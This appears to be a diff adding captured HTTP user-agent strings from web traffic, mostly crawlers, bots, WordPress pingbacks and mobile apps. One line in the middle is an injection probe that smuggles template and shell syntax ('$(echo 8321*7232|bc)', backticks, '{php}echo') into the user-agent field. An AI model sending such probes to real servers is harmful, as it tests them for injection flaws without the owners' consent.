    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1607835806-0
    +WhatsApp/2.20.207.17 A
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1607860204-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1607860207-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1607890079-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1607890080-0
    +WordPress/5.5.3; https://seconnexion.com
    +WordPress.com; http://seconnexion.com
    +WordPress.com; https://seconnexion.com
    +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.90 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html),gzip(gfe)
    +AvsDeviceSdk/1.20.1
    +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 PTST/201213.201206
    +WhatsApp/2.20.207.19 A
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1607960094-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1607960092-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1607979530-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1607979509-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1607949909-0
    +python-urllib3/1.26.2
    +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
    +Mozilla/5.0 (compatible; Yahoo Link Preview; https://help.yahoo.com/kb/mail/yahoo-link-preview-SLN23615.html) maild/1607990400-0
    +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview Analytics) Chrome/87.0.4280.90 Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
    +WordPress/5.4.4; https://piratx.ru
    +WordPress/5.6; https://blogchain.com.ua
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1608013072-0
    +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 Edg/87.0.664.41
    +WordPress/5.5.3; http://medczdra.ru
    +Mozilla/5.0 (X11; Linux x86_64; rv:83.0) adbeat.com/policy Gecko/20100101 Firefox/83.0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1608070970-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1608064314-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1607995927-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1608001760-0
    +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/10.4.2.659 (SpeedMode; Proxy; Android 4.4.2; EVERCOSS_A74C ) U2/1.0.0 Mobile
    +WordPress/5.5.3; https://aster.cloud
    +Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) adbeat.com/policy Gecko/20100101 Firefox/83.0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1608059071-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1608064313-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1608064311-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1608064323-0
    +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.4.0.1180 (SpeedMode; Proxy; Android 7.1.1; GT-S5360 ) U2/1.0.0 Mobile
    +Mozilla/5.0 (Linux; Android 4.0.4; Galaxy Nexus Build/IMM76B) AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview Analytics) Chrome/87.0.4280.90 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
    +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/10.1.2.571 (SpeedMode; Proxy; Android 4.0.4; Vandroid_T ) U2/1.0.0 Mobile
    +WordPress/5.6; https://practicalprogramming.fr
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1608012073-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1608012074-0
    +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Mobile Safari/537.36 PTST/201216.211207
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1608080932-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1608160307-0
    +WordPress/5.5.3; https://pscs-psg.com
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1608081571-10
    +python-requests/2.7.0 CPython/2.7.17 Windows/2012ServerR2
    +Mozilla/5.0 (X11; Linux x86_64; rv:78.0) adbeat.com/policy Gecko/20100101 Firefox/78.0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1608113069-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1608094759-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1608094736-0
    +Mozilla/5.0 (en-US) AppleWebKit/537.36 (KHTML, like Gecko; Widget Server) Chrome/87.0.4280.90 Safari/537.36
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1608113059-0
    +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.67 Safari/537.36
    +Java/15.0.1
    +WordPress/5.5.3; https://nastoysam.ru EWWW/582.0
    +WhatsApp/2.2049.10 N
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1608218646-0
    +WordPress/5.6; https://help.britecore.com
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1608218647-10
    +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/68.0.3440.106 Safari/537.36 Prerender (+https://github.com/prerender/prerender)
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1608231913-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1608231879-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1608238463-10
    +python-requests/2.25.1
    +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 PTST/170908.190906
    +WhatsApp/2.20.132.2 i
    +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) mrs_image/1608218215-60
    +WhatsApp/2.20.207.18 A
    +curl/7.74.0
    +WordPress/5.5.3; https://printersupportdesk.us
    +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Mobile Safari/537.36 PTST/201217.201245
    +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Mobile Safari/537.36 PTST/201218.151242
    +Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:83.0) adbeat.com/policy Gecko/20100101 Firefox/83.0
    +Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/Favicons/2.0; +https://help.mail.ru/webmaster/indexing/robots)
    +WordPress/5.6; https://woww.best
    +WordPress/4.9.3; http://radio.apascentar.org
    +WhatsApp/2.20.207.20 A
    +okhttp/3.3.1
    +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.4.1.1138 (SpeedMode; Proxy; Android 5.1.1; SM-N910H ) U2/1.0.0 Mobile
    +WordPress/4.9.16; http://opal2.shinraebc.com
    +WordPress/5.6; https://iapple-59.ru
    +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/10.9.5.983 (SpeedMode; Proxy; Android 6.0; I7D ) U2/1.0.0 Mobile
    +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36
    +Apache-HttpClient/4.5.13 (Java/15.0.1)
    +WordPress/5.6; https://glamiss.net; verifying pingback from 2.38.152.84
    +WordPress/4.4.24; http://www.forumviagra.com
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1608415571-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1608368396-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1608351041-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1608368395-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1608370482-0
    +WordPress/5.5.3; https://tutostecnologicos.com
    +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) mrs_image/1608368116-60
    +Java/1.8.0_262-heroku
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1608483488-0
    +WordPress/5.5.3; https://antiviruse.org
    +Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:82.0) adbeat.com/policy Gecko/20100101 Firefox/82.0
    +Microsoft Office/12.0 (Windows NT 5.1; Picture Manager 12.0.4518; Pro)
    +WordPress/5.6; https://www.nouvelles-du-monde.com
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1608510214-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1608514392-0
    +NaverSearch/10.29.1 (com.nhncorp.NaverSearch; build:10.29.1.2; iOS 14.2.0) Alamofire/5.2.2
    +WordPress/5.6; https://academy.aurachain.nbeta.ro
    +WordPress/5.6; https://novindevelopers.com
    +WordPress/5.6; https://www.dailylove.xyz
    +WordPress/5.5.3; https://www.octylabs.com
    +WordPress/5.6; https://amm.agency
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1608586739-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1608586876-0
    +WordPress/5.4.4; https://foreignbanks.ru
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1608567734-10
    +WordPress/5.5.3; https://pomognastroit.ru
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1608514461-0
    +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 PTST/201220.221201
    +WordPress/4.9.16; http://www.vdxtpr.co
    +WordPress/4.4.24; http://fobbly.com/members_portal
    +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/10.7.8.806 (SpeedMode; Proxy; Android 10; Redmi_Note_7 ) U2/1.0.0 Mobile
    +WordPress.com; http://thinkdfir.com
    +yacybot (/global; amd64 Linux 5.3.18-lp152.57-preempt; java 11.0.9; Europe/de) http://yacy.net/bot.html
    +<%=8321*7232%> $ { 8321*7232}#{8321*7232} { { 8321*7232}}{php}echo 8321*7232;{/php}$(echo 8321*7232|bc)`echo 8321*7232|bc`@(8321*7232)
    +Mozilla/5.0 (Windows NT 6.1; WOW64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4230.1 Safari/537.36
    +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36
    +Screaming Frog SEO Spider/14.2 Beta 3
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1608679341-10
    +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1608614202-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1608618003-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1608636604-0
    +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/10.1.2.571 (SpeedMode; Proxy; Android 4.4.2; C3 ) U2/1.0.0 Mobile
    +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 PTST/201221.201206
    +WordPress/5.6; https://dariaseramd.com
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1608672760-0
    +Snapchat/11.8.0.33 (iPhone10,2; iOS 14.3; gzip)
    +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/79.0.3945.117 Safari/537.36 Prerender (+https://github.com/prerender/prerender)
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1608672760-60
    +WordPress/4.9.16; http://bajaretireddate.com
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1608672759-0
    +WordPress/5.6; https://ez-case.ru
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1608672761-10
    +Apache-HttpClient/4.5.10 (Java/1.8.0_275)
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1608743771-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1608743782-10
    +WordPress/5.3.6; http://johanhoffmann.dk; verifying pingback from 175.158.36.92
    +WordPress/5.1.8; http://gorodgeniev.ru
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1608684846-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1608689473-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1608742755-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1608743279-0
    +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 PTST/201222.161247
    +WordPress/5.6; https://cyberiqs.com
    +WordPress/5.6; https://labuda.blog
    +yacybot (/global; amd64 Linux 5.4.0-58-generic; java 1.8.0_242; Etc/en) http://yacy.net/bot.html
    +Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:82.0) adbeat.com/policy Gecko/20100101 Firefox/82.0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1608814189-0
    +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 PTST/201223.161206
    +Apache-HttpClient/4.5.12 (Java/15.0.1)
    +Mozilla/5.0 (en-us) AppleWebKit/534.14 (KHTML, like Gecko; Google Wireless Transcoder) Chrome/9.0.597 Safari/534.14 wimb_monitor.py/1.0
    +WordPress/5.6; https://staging35.cyberiqs.com
    +Mozilla/5.0 (Windows NT 10.0; WOW64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1608893288-0
    +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.77 Safari/535.7 AppEngine-Google; (+http://code.google.com/appengine; appid: s~feedly-social)
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1608933994-0
    +WordPress/5.6; https://payameirani.com
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1608933992-0
    +Mozilla/5.0 (compatible; Nimbostratus-Bot/v1.3.2; http://cloudsystemnetworks.com),gzip(gfe)
    +WordPress/5.6; https://rucore.net/p
    +WordPress/4.9.4; https://www.terraeve.com
    +WordPress/5.1.8; http://hwoodhospital.co.uk
    +WordPress/5.2.9; http://ajfbf.org
    +WordPress/5.4.4; https://gilsongoncalves.com.br
    +WordPress/5.1.8; http://forhimm.com
    +WordPress/4.8.15; http://alzheimercentrum.dev.eenvoudmedia.nl
    +WordPress/5.6; https://trufem.club
    +WordPress/4.4.1; http://www.expandingstudentssuccess.org
    +WordPress.com; https://babyalists.com
    +WordPress/4.9.16; https://lalederwaren.de
    +WordPress/5.2.9; http://forums.edgeofplay.com
    +WordPress/5.2.9; https://forums.edgeofplay.com
    +WordPress/4.7.19; https://campingpraat.nl
    +WordPress/5.2.9; https://www.studentlife.dk
    +WordPress/5.6; https://opros03.ru
    +WordPress/5.6; https://light-clay.ru
    +Scrapy/2.4.1 (+https://scrapy.org)
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1608945151-0
    +WhatsApp/2.20.202.12 A
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1608943445-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1608948703-0
    +GoogleTV/092754 youtube.com/tv#
    +WordPress/4.9.10; https://blogsacademicos.com
    +WordPress.com; https://expabroad.blog
    +WordPress/5.4; https://itpark.com.tm
    +WordPress/4.7.19; https://osdaily.ru
    +WordPress/5.6; https://www.mikaelbengtsson.com
    +WordPress/5.2.9; https://matricematrice.be
    +WordPress/5.6; http://www.peermathhelp.com
    +Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:83.0) adbeat.com/policy Gecko/20100101 Firefox/83.0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1609099184-10
    +Mozilla/5.0 (compatible; Yahoo Link Preview; https://help.yahoo.com/kb/mail/yahoo-link-preview-SLN23615.html) maild/1609055165-0
    +axios/0.21.1
    +Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) adbeat.com/policy Gecko/20100101 Firefox/84.0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1609096348-0
    +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/10.7.8.806 (SpeedMode; Proxy; Android 8.1.0; PMT4227_3G_RU ) U2/1.0.0 Mobile
    +Snapchat/11.8.0.33 (iPhone12,8; iOS 14.2; gzip)
    +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36 PTST/170908.190906
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1609097627-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1609048784-0
    +FDM/6.13.0.3463
    +Snapchat/11.0.6.81 (iPhone11,8; iOS 13.6.1; gzip)
    +WordPress/5.6; http://villa-chanterelle.org; verifying pingback from 184.82.32.217
    +WordPress/5.2.9; https://universitylaunch.com
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1609178022-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1609162599-0
    +libwww-perl/6.50
    +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 PTST/201227.171201
    +WordPress.com; https://rinatestpremium1711.wordpress.com
    +Java-http-client/14.0.1
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1609267034-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1609283404-0
    +Python/3.9 aiohttp/3.7.3
    +WordPress/5.0.11; https://equalitytriangle.org/home
    +WordPress/5.1.8; http://tsb-company.ru
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1609265022-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1609265041-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1609265048-10
    +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.3.0.1130 (SpeedMode; Proxy; Android 6.0.1; SM-G600FY ) U2/1.0.0 Mobile
    +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
